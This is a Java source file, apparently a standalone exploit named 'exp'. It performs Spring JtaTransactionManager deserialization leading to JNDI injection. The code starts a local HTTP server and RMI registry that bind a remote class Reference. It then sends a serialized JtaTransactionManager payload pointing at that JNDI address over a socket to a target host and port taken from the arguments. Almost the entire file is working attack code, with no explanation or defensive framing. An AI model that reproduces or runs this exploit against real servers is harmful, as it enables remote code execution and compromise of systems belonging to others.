java source code of exp

package me.lightless.springtx;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;

import javax.naming.Reference;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

class HttpFileHandler implements HttpHandler {
    public void handle(HttpExchange httpExchange) {
        try {
            System.out.println("Request: "+httpExchange.getRemoteAddress()+" "+httpExchange.getRequestURI());
            InputStream inputStream = HttpFileHandler.class.getResourceAsStream(httpExchange.getRequestURI().getPath());
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            while(inputStream.available()>0) {
                byteArrayOutputStream.write(inputStream.read());
            }

            byte[] bytes = byteArrayOutputStream.toByteArray();
            httpExchange.sendResponseHeaders(200, bytes.length);
            httpExchange.getResponseBody().write(bytes);
            httpExchange.close();
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}

public class exp {
    public static void main(String[] args) throws Exception {

        // target ip and port
        String ServerAddress = args[0];
        int ServerPort = Integer.parseInt(args[1]);

        // local http server port
        String localAddress = args[2];
        int localPort = Integer.parseInt(args[3]);

        // local RMI port
        int RMIPort = Integer.parseInt(args[4]);

        // start local HTTP server
        System.out.println("Start Local HTTP Server");
        HttpServer httpServer = HttpServer.create(new InetSocketAddress(localPort), 0);
        httpServer.createContext("/",new HttpFileHandler());
        httpServer.setExecutor(null);
        httpServer.start();

        // start local RMI server
        System.out.println("Creating RMI Registry");
        Registry registry = LocateRegistry.createRegistry(RMIPort);
        String factoryLocation = "http://" + localAddress + ":" + localPort + "/";
        System.out.println("Factory location: " + factoryLocation);
        Reference reference = new javax.naming.Reference("ExportObject","ExportObject", factoryLocation);
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);
        registry.bind("Object", referenceWrapper);
        String JNDIAddress = "rmi://127.0.0.1:" + RMIPort + "/Object";
        System.out.println("JNDI Address: " + JNDIAddress);

        // Connect to target via socket.
        System.out.println("Connecting to target " + ServerAddress + ":" + ServerPort);
        Socket socket = new Socket(ServerAddress, ServerPort);
        System.out.println("Connect success.");

        // Build payload
        org.springframework.transaction.jta.JtaTransactionManager payload = new org.springframework.transaction.jta.JtaTransactionManager();
        payload.setUserTransactionName(JNDIAddress);

        // send to server and fuck it!
        // or you can write payload to file and do something else..
        // ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("payload.bin"));
        // oos.writeObject(payload);
        System.out.println("send payload to target!");
        ObjectOutputStream oos = new ObjectOutputStream(socket.getOutputStream());
        oos.writeObject(payload);
        oos.flush();
    }
}